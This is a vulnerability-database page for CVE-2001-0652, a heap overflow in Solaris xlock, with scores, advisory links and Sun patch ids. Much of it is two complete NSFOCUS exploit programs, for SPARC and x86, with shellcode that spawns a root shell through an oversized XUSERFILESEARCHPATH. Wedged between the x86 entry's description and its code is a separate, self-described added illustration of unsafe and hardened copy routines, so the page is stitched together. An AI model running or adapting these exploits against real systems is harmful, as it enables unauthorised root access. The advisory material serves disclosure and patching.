CVE-2001-0652
CVSS 7.2
Published: 2001-10-30 00:00:00
Revised: 2016-10-17 22:11:37

[Original] Heap overflow in xlock in Solaris 2.6 through 8 allows local users to gain root privileges via a long (1) XFILESEARCHPATH or (2) XUSERFILESEARCHPATH environmental variable.


[CNNVD] Solaris xlock heap overflow vulnerability (CNNVD-200110-126)

        xlock in Solaris 2.6 through 8 contains a heap overflow. Local users can gain root privileges via an overly long (1) XFILESEARCHPATH or (2) XUSERFILESEARCHPATH environment variable.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:131  Heap Overflow in Solaris 7 xlock
oval:org.mitre.oval:def:10  Heap Overflow in Solaris 8 xlock
* OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for further technical detail on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0652
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0652
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-126
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=99745571104126&w=2
(UNKNOWN)  BUGTRAQ  20010810 NSFOCUS SA2001-05 : Solaris Xlock Heap Overflow Vulnerability
http://www.securityfocus.com/bid/3160
(UNKNOWN)  BID  3160
http://xforce.iss.net/static/6967.php
(UNKNOWN)  XF  solaris-xlock-bo(6967)

- Vulnerability information

Solaris xlock heap overflow vulnerability
High risk  Buffer overflow
2001-10-30 00:00:00 2005-05-02 00:00:00
Local
        xlock in Solaris 2.6 through 8 contains a heap overflow. Local users can gain root privileges via an overly long (1) XFILESEARCHPATH or (2) XUSERFILESEARCHPATH environment variable.

- Advisories and patches

        Sun has provided the patch IDs that the forthcoming fixes have been assigned. This record will be updated when the fixes are actually available for download.

  •  Sun Solaris 8_x86: Sun 108653-33
  •  Sun Solaris 8: Sun 108652-38
  •  Sun Solaris 2.6: Sun 105633-60
  •  Sun Solaris 2.6 _x86: Sun 106248-45
  •  Sun Solaris 7.0 _x86: Sun 108377-26
  •  Sun Solaris 7.0: Sun 108376-30

- Vulnerability information (21058)

Solaris 2.6/7/8 SPARC xlock Heap Overflow Vulnerability (EDBID:21058)
solaris local
2001-08-10 Verified
0 Nsfocus
N/A
source: http://www.securityfocus.com/bid/3160/info

Xlock is a utility for locking X-windows displays. It is installed setuid root because it uses the user's password to authorize access to the display when it is locked.

The version of xlock that ships with Solaris as part of OpenWindows contains a heap overflow in its handling of an environment variable.

Local attackers may be able to execute arbitrary code with effective privileges of xlock. 

/*
 *  sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
 *  Copyright (c) 2001 - Nsfocus.com
 *
 *  Tested in Solaris 2.6/7/8 SPARC
 *
 *  DISCLAIMS:
 *  This  is a proof of concept code.  This code is for test purpose 
 *  only and should not be run against any host without permission from 
 *  the system administrator.
 * 
 *  NSFOCUS Security Team <security@nsfocus.com>
 *  http://www.nsfocus.com
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, memset, memcpy */
#include <strings.h>    /* bzero */
#include <unistd.h>     /* execve */
#include <sys/systeminfo.h>

#define RETLOC  0xffbee8c4  /* default "return address" location (Solaris 7) */
#define SP      0xffbefffc  /* default "bottom" stack address (Solaris 7/8) */

#define VULPROG "/usr/openwin/bin/xlock"

#define NOP     0xaa1d4015      /* "xor %l5, %l5, %l5" */


char            shellcode[] =           /* from scz's shellcode for SPARC */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\xaa\x1d\x40\x15"  
"\x81\xc3\xe0\x14\xaa\x1d\x40\x15\xaa\x1d\x40\x15\x90\x08\x3f\xff"
"\x82\x10\x20\x8d\x91\xd0\x20\x08\x90\x08\x3f\xff\x82\x10\x20\x17"
"\x91\xd0\x20\x08\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65"
"\x20\x80\x3a\x29\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34"
"\x92\x0b\x80\x0e\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\xc0\x2a\x20\x07\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
"\x82\x10\x20\x01\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack point address */
long
get_sp(void)
{
        __asm__("mov %sp,%i0");
}

long 
get_shelladdr(long sp_addr, char **arg, char **env)
{
        long            retaddr;
        int             i;
        char            plat[256];
        char            pad = 0, pad1;
        int             env_len, arg_len, len;


        /* calculate the length of "VULPROG" + argv[] */
        for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {
                arg_len += strlen(arg[i]) + 1;
        }

        
        /* calculate the pad number. */
        pad = 3 - arg_len % 4;
        printf("shellcode address padding = %d\n", pad);

        memset(env[0], 'A', pad);
        env[0][pad] = '\0';

                /* get environ length */
        for (i = 0, env_len = 0; env[i]!=NULL; i++) {
                env_len += strlen(env[i]) + 1;
        }

        /* get platform info  */
        sysinfo(SI_PLATFORM, plat, 256);

        len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1;
        printf("stack arguments len = %#x(%d)\n", len, len);

        pad1 = len % 4;

        if(pad1 == 3 ) pad1 = 5;
        else pad1 = 4 - pad1;

        printf("the padding zeros number = %d\n\n", pad1);

        /* get the exact shellcode address */
        retaddr = sp_addr - pad1       /* the trailing zero number */
                          - strlen(VULPROG) - 1 
                          - strlen(plat) - 1 ;

        for(i--;i>0;i--) retaddr -= strlen(env[i]) + 1;                

        printf("Using RET address = 0x%x\n", retaddr);
        return retaddr;

} /* End of get_shelladdr */


int 
main(int argc, char **argv)
{
        char            buf[2048], fake_chunk[48];
        long            retaddr, sp_addr = SP;
        char           *arg[24], *env[24];
        char            padding[64];
        long            retloc = RETLOC;
        unsigned int   *ptr;
        char            ev1[]="XUSERFILESEARCHPATH=";
        long            ev1_len;
        long            overbuflen = 1024;

        if (argc > 1) /* you need adjust retloc offset in your system */
                retloc += atoi(argv[1]);

        arg[0] = VULPROG;
        arg[1] = NULL;

        bzero(buf, sizeof(buf));
        ev1_len = strlen(ev1);
        memcpy(buf, ev1, ev1_len);
        memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));
        
        env[0] = padding;       /* put padding buffer in env */
        env[1] = shellcode;     /* put shellcode in env */
        env[2] = buf;           /* put overflow environ */    
        env[3] = NULL;          /* end of env */

        /* get stack "bottom" address */
        if(((unsigned char) (get_sp() >> 24)) == 0xef) { /* Solaris 2.6 */
          sp_addr = SP - 0x0fbf0000; 
          retloc -= 0x0fbf0000;
        }

        retaddr = get_shelladdr(sp_addr, arg, env);
        printf("Using retloc = 0x%x \n", retloc);
        
        memset(fake_chunk, '\xff', sizeof(fake_chunk));
        ptr = (unsigned int *) fake_chunk;
        *(ptr + 0) = 0xfffffff9;
        *(ptr + 2) = retaddr - 8;
        *(ptr + 8) = retloc - 8;

        memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

        execve(VULPROG, arg, env);
        perror("execve");
        return 1;
}  /* End of main */

- Vulnerability information (21059)

Solaris 8 x86 xlock Heap Overflow Vulnerability (EDBID:21059)
solaris local
2001-08-10 Verified
0 Nsfocus
N/A
source: http://www.securityfocus.com/bid/3160/info
 
Xlock is a utility for locking X-windows displays. It is installed setuid root because it uses the user's password to authorize access to the display when it is locked.
 
The version of xlock that ships with Solaris as part of OpenWindows contains a heap overflow in its handling of an environment variable.
 
Local attackers may be able to execute arbitrary code with effective privileges of xlock. 
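The bug class behind both entries above (EDBID 21058 and 21059) is a fixed-size heap buffer filled from a caller-controlled environment variable without a length check. The following is an added illustration, not text from the advisory and not NSFOCUS's code: it puts the unsafe copy pattern next to two defensive forms a setuid program should use, a length-checked copy that rejects oversized values, and an environment filter that drops the two variables named in the advisory before they are ever consulted. SEARCHPATH_MAX, the function names and the sample environment are constructed for the illustration; xlock's real internal buffer layout is not reproduced.

```c
/* Added example (not part of the advisory or the NSFOCUS PoC).
 * Buffer size, function names and sample environment are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SEARCHPATH_MAX 1024   /* constructed buffer size for the illustration */

/* Vulnerable pattern: strcpy trusts the length of an attacker-chosen value.
 * Kept only for comparison; never call it with untrusted input. */
char *load_searchpath_unsafe(const char *value)
{
        char *path = malloc(SEARCHPATH_MAX);
        if (path == NULL)
                return NULL;
        strcpy(path, value);      /* overruns the heap chunk when value is longer */
        return path;
}

/* Hardened form 1: measure first, reject oversized values rather than
 * truncating silently. Returns a fresh copy, or NULL with *err set. */
char *load_searchpath_checked(const char *value, const char **err)
{
        size_t n;
        char *path;

        if (value == NULL) { *err = "unset"; return NULL; }
        n = strlen(value);
        if (n >= SEARCHPATH_MAX) { *err = "value too long"; return NULL; }
        path = malloc(n + 1);
        if (path == NULL) { *err = "out of memory"; return NULL; }
        memcpy(path, value, n + 1);
        *err = NULL;
        return path;
}

/* Hardened form 2: a privileged program should not honour file-search
 * variables supplied by its caller at all. Copies envp into out[], dropping
 * the two variables from the advisory; returns the number of entries kept.
 * out[] always ends with a NULL entry (outsz must be >= 1). */
static const char *const blocked[] = {
        "XFILESEARCHPATH=", "XUSERFILESEARCHPATH=", NULL
};

size_t filter_env(char *const *envp, const char **out, size_t outsz)
{
        size_t i, b, kept = 0;

        for (i = 0; envp[i] != NULL && kept + 1 < outsz; i++) {
                int drop = 0;
                for (b = 0; blocked[b] != NULL; b++)
                        if (strncmp(envp[i], blocked[b], strlen(blocked[b])) == 0)
                                drop = 1;
                if (!drop)
                        out[kept++] = envp[i];
        }
        out[kept] = NULL;
        return kept;
}

int main(void)
{
        static char attack[SEARCHPATH_MAX + 64];  /* constructed oversized value */
        const char *err;
        char *p;
        char *const envp[] = {                    /* constructed environment */
                "HOME=/home/user", "XUSERFILESEARCHPATH=/tmp/x", "DISPLAY=:0", NULL
        };
        const char *safe[8];

        memset(attack, 'A', sizeof attack - 1);
        attack[sizeof attack - 1] = '\0';

        p = load_searchpath_checked("/usr/lib/X11/%T/%N", &err);
        printf("normal value: %s\n", p ? "accepted" : err);
        free(p);

        p = load_searchpath_checked(attack, &err);
        printf("oversized value (%lu bytes): %s\n", (unsigned long)strlen(attack),
               p ? "accepted" : err);
        free(p);

        printf("filtered environment keeps %lu of 3 entries\n",
               (unsigned long)filter_env(envp, safe, 8));
        return 0;
}
```

The checked loader refuses rather than truncates, because a silently shortened search path changes which resource files are loaded, which is its own problem for a setuid program; the filter is the stronger control, since a locked display has no business reading per-user X resource search paths from the locking user's environment in the first place.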

/*
 *  sol_x86_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
 *  Copyright (c) 2001 - Nsfocus.com
 *
 *  Tested in Solaris 8 x86.
 *
 *  DISCLAIMS:
 *  This  is a proof of concept code.  This code is for test purpose 
 *  only and should not be run against any host without permission from 
 *  the system administrator.
 * 
 *  NSFOCUS Security Team <security@nsfocus.com>
 *  http://www.nsfocus.com
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, memset, memcpy */
#include <unistd.h>
#include <strings.h>
#include <sys/types.h>

#define RETLOC  0x080463c8  /* default return address location (Solaris 8 x86) */
#define SP      0x08047ffc  /* default "bottom" stack address (Solaris 8 x86) */

#define VULPROG "/usr/openwin/bin/xlock"

char            shellcode[] =           
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\xeb\x28\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x83\xec\x64\x33\xd2\xc6\x45\xce\x9a\x89"
"\x55\xcf\x89\x55\xd3\xc6\x45\xd3\x07\xc6\x45\xd5"
"\xc3\x89\x55\xfc\x83\xed\x32\x33\xc0\x50\x50\xb0"
"\xca\xff\xd5\x83\xc4\x08\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
"\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

int 
main(int argc, char **argv)
{
        char            buf[2048], fake_chunk[48];
        long            retaddr, sp_addr = SP;
        char           *arg[24], *env[24];
        long            retloc = RETLOC;
        unsigned int   *ptr;
        char            ev1[]="XUSERFILESEARCHPATH=";
        long            ev1_len;
        long            overbuflen = 1024;        

        if (argc > 1) /* adjust retloc */
                retloc += atoi(argv[1]);

        bzero(buf, sizeof(buf));
        ev1_len = strlen(ev1);
        memcpy(buf, ev1, ev1_len);
        memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));

        arg[0] = VULPROG;
        arg[1] = NULL;

        env[0] = shellcode;     /* put shellcode in env */
        env[1] = buf;           /* put overflow environ */
        env[2] = NULL;          /* end of env */
        
        /* get the not exact shellcode address :) */
        retaddr = sp_addr - strlen(VULPROG) - 1
                          - strlen("i86pc") - 1 
                          - strlen(buf) - 1
                          - strlen(shellcode) - 1;

        printf("Using RET address = 0x%lx\n", retaddr);
        printf("Using retloc = 0x%lx \n", retloc);

        ptr = (unsigned int *) fake_chunk;
        memset(fake_chunk, '\xff', sizeof(fake_chunk));
        *(ptr + 0) = 0xfffffff9;
        *(ptr + 2) = retaddr;
        *(ptr + 8) = retloc - 8;

        memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

        execve(VULPROG, arg, env);
        perror("execve");
        return(1);
}  /* End of main */

- Vulnerability information

1924
Solaris xlock Multiple Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-08-10 Unknown
2001-08-10 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 
